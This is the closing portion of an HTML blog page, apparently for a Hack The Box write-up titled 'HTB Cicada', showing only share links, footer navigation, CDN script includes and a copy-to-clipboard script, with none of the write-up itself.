  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/01/06/HTB-Cicada/&title=HTB Cicada"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/01/06/HTB-Cicada/&title=HTB Cicada"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/01/06/HTB-Cicada/&title=HTB Cicada"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/01/06/HTB-Cicada/&title=HTB Cicada"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/01/06/HTB-Cicada/&name=HTB Cicada&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/01/06/HTB-Cicada/&t=HTB Cicada"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024-2025
    wang
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/tag/">Tag</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
